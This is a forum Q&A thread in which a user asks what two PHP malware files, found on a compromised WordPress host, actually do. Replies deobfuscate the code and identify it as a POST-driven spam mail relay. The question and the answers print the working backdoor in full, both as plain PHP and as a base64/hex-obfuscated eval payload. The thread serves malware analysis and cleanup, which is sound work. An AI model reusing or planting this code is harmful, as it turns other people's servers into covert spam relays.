# PHP attack on server, what is this code doing?

Tags: php, decode, malware

So I have been helping someone who has suffered from malware on their godaddy server with wordpress. I think I have removed the code that was causing the issue, but I am just curious as to what this php is doing, It seems as though its looping through the variables stored in POST and attempting to decode any information, and then email it...can someone help me understand this? Cheers

```
<?php 
    $data = array('');
    foreach ($_POST as $key => $value) {
        array_push($data, $value);
    }
    $jxWnO = stripslashes(base64_decode(base64_decode($data[1] ))); 
    $e2WPWta = stripslashes(base64_decode(base64_decode($data[2] ))); 
    $hwrDZxfxhl = stripslashes(base64_decode(base64_decode($data[3] )));  
    $JQiQiWf3Pg = stripslashes(base64_decode(base64_decode($data[4] )));  
    $Fr2ZEIZYuKj = mail(stripslashes($jxWnO), stripslashes($e2WPWta), stripslashes($hwrDZxfxhl), stripslashes($JQiQiWf3Pg));
    if ($Fr2ZEIZYuKj) { 
        echo $Fr2ZEIZYuKj;
    } else { 
        echo '99';
    }
?>
```

And then in a seperate file:

```
<?php $code=base64_decode("XCRfZjJkZGFkYjBkZDUwNjdiODNjMjA0NDk2NmMwNDFiYWMgPSBhcnJheSgnJyk7IFx4NjZceDZGXHg3Mlx4NjVceDYxXHg2M1x4NjggKFwkXHg1Rlx4NTBceDRGXHg1M1x4NTQgYXMgXCRfN2Q1MDQ1ZTBmNTU5ODI4MzY4ODhiOGVmN2U4M2QzNzBlOTlmMjU4NGQxNzNhNmQ0MDRkNTQzNWQ1NWE3OGQ1NzBhNjk4ZWFhNDdmNDQ4NmJhNGVjYTg1MGJhMjgxMjQ3MmZkMjc0NmUzMzQ4MDI0NzY2ZWI5MzNlOTFjYTE5NWMgPT4gXCRfYzMxMGE5MGI0NjcxNGZhOTYzMzk0MTkwYjEyYThjNjFhYWFlNDk1Y2RhODE4ZTA5OWVkNmExYmUpIHtceDYxXHg3Mlx4NzJceDYxXHg3OVx4NUZceDcwXHg3NVx4NzNceDY4KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjLCBcJF9jMzEwYTkwYjQ2NzE0ZmE5NjMzOTQxOTBiMTJhOGM2MWFhYWU0OTVjZGE4MThlMDk5ZWQ2YTFiZSk7fSBcJF9jNTNmOTg1NjJiYjM2M2RhNzE5YjBjNDQ2ZGQ4YzBhMTVjZWJmNDVhID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1sxXSApKSk7IFwkXzhkMzQxZGM0ZjliZDM1YzdlOTQ1YmIxODJjM2Q0YzY4MjA0NTBhZWFmNGM2N2NmYThjYTkyZjBhOGFjOTI5MTEzZDdjZTRiYTA4NmE5ZGVmMzg5M2VlMjYwODgyNjUxOWFhYzI4YmIxZDM5NzZhMzZkZDU1NTBhMGVmZjdjNTYzID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1syXSApKSk7IFwkX2RkYmU1ZDM5ID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1szXSApKSk7IFwkXzAyMDNhYzU4NjU5YTllNTAxNDA4YjkxZGYyYzliNjFhMTFiM2EzODNiY2IzZGEwYmJmNTJhMTdiYTAwZDkwODggPSBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShceDYyXHg2MVx4NzNceDY1XHgzNlx4MzRceDVGXHg2NFx4NjVceDYzXHg2Rlx4NjRceDY1KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjWzRdICkpKTsgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSA9IFx4NkRceDYxXHg2OVx4NkMoXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFwkX2M1M2Y5ODU2MmJiMzYzZGE3MTliMGM0NDZkZDhjMGExNWNlYmY0NWEpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfOGQzNDFkYzRmOWJkMzVjN2U5NDViYjE4MmMzZDRjNjgyMDQ1MGFlYWY0YzY3Y2ZhOGNhOTJmMGE4YWM5MjkxMTNkN2NlNGJhMDg2YTlkZWYzODkzZWUyNjA4ODI2NTE5YWFjMjhiYjFkMzk3NmEzNmRkNTU1MGEwZWZmN2M1NjMpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfZGRiZTVkMzkpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfMDIwM2FjNTg2NTlhOWU1MDE0MDhiOTFkZjJjOWI2MWExMWIzYTM4M2JjYjNkYTBiYmY1MmExN2JhMDBkOTA4OCkpOyBceDY5XHg2NiAoXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSl7IFx4NjVceDYzXHg2OFx4NkYgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZTt9IGVsc2UgeyBceDY1XHg2M1x4NjhceDZGICdceDM5XHgzOSc7fQ=="); eval("return eval(\"$code\");") ?>
```

Comment: If you do the base64_decode() that produces `$code,` you'll find a big hex-obfuscated string (example: `\$_f2ddadb0dd5067b83c2044966c041bac = array(''); \x66\x6F\x72\x65\x61\x63\x68`) which does _something_ malicious, but would be hard to translate into something readable. At the end, it is then `eval()`'d. The `mail()` call there may only be a callback to let the attacker know it was successful, but the guts of whatever this does is in that obfuscated eval'd code.

Comment: Possibly, (guessing based on knowledge, experience, rather than actually decoding what's posted here) the stuff from `$_POST` forms a command interface to the malicious code in the big eval.

Comment: The separate file -- was it included/required in the file with the $_POST stuff? If not, it isn't clear how the two relate because nothing is eval'd in the $_POST/mail() code.

Comment: @MichaelBerkowski No, they weren't included, there was about 10 files that contained just the first code segment, and about 10 files that contained just the 2nd code segment. I deleted all of them, but iThemes says there may be infected javascript located somewhere. Is there an easy way to find this?

Comment: My last comment - the mail() part being fed from `$_POST` is quite possibly just a spam interface for them. They can send whatever they like to that script, and the WP site relays it as email. A classic means of sending spam.

Comment: Don't know. I don't work with WP and have never heard of iThemes, but generally the only good advice when dealing with one of these attacks is to discard everything and restore from a backup. It's really hard to find everything they litter through the site, especially if it gets mixed in with minifed JS and the like.

Answer (score 0, accepted):

Renamed vars for easier reading...

```
<?php
   $data = array('');
   // Takes a post submitted to this url
    foreach ($_POST as $key => $value) {
        array_push($data, $value);
    }
    // For each post form field in the array it adds them to vars after decoding them twice.

    $sVar1 = stripslashes(base64_decode(base64_decode($data[1] ))); 
    $sVar2 = stripslashes(base64_decode(base64_decode($data[2] ))); 
    $sVar3 = stripslashes(base64_decode(base64_decode($data[3] )));  
    $sVar4 = stripslashes(base64_decode(base64_decode($data[4] )));  

    // Then it emails the data submitted to the email contained in var1
    // bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )
    $sVar5 = mail(stripslashes($sVar1), stripslashes($sVar2), stripslashes($sVar3), stripslashes($sVar4));

    // Outputs mail return function (success/error(99)) TRUE | FALSE
    if ($sVar5) { 
        // If TRUE prints var5
        echo $sVar5;
    } else { 
       // If does not email successfully prints 99
        echo '99';
    }
```

This is very interesting - can you expand on how the two files/code snippets are related and interact with one another?

Second script slightly reduced in obfuscation after decoding:

```
"\$var1 = array(''); 
\x66\x6F\x72\x65\x61\x63\x68 (\$\x5F\x50\x4F\x53\x54 as \$var2 => \$var3) {\x61\x72\x72\x61\x79\x5F\x70\x75\x73\x68(\$var1, \$var3);} 
\$var7 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[1] ))); 
\$var4 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[2] ))); 
\$var8 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[3] ))); 
\$var5 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[4] ))); 
\$var6 = \x6D\x61\x69\x6C(\x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var7), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var4), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var8), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var5)); 
\x69\x66 (\$var6){ \x65\x63\x68\x6F \$var6;} else { \x65\x63\x68\x6F '\x39\x39';}"
```

Comment: The files don't seem to interact, there is no require

Comment: It appears that the second script after decoding is what either created the first script or equivalent, at least structurally wise after eval. Updated answer.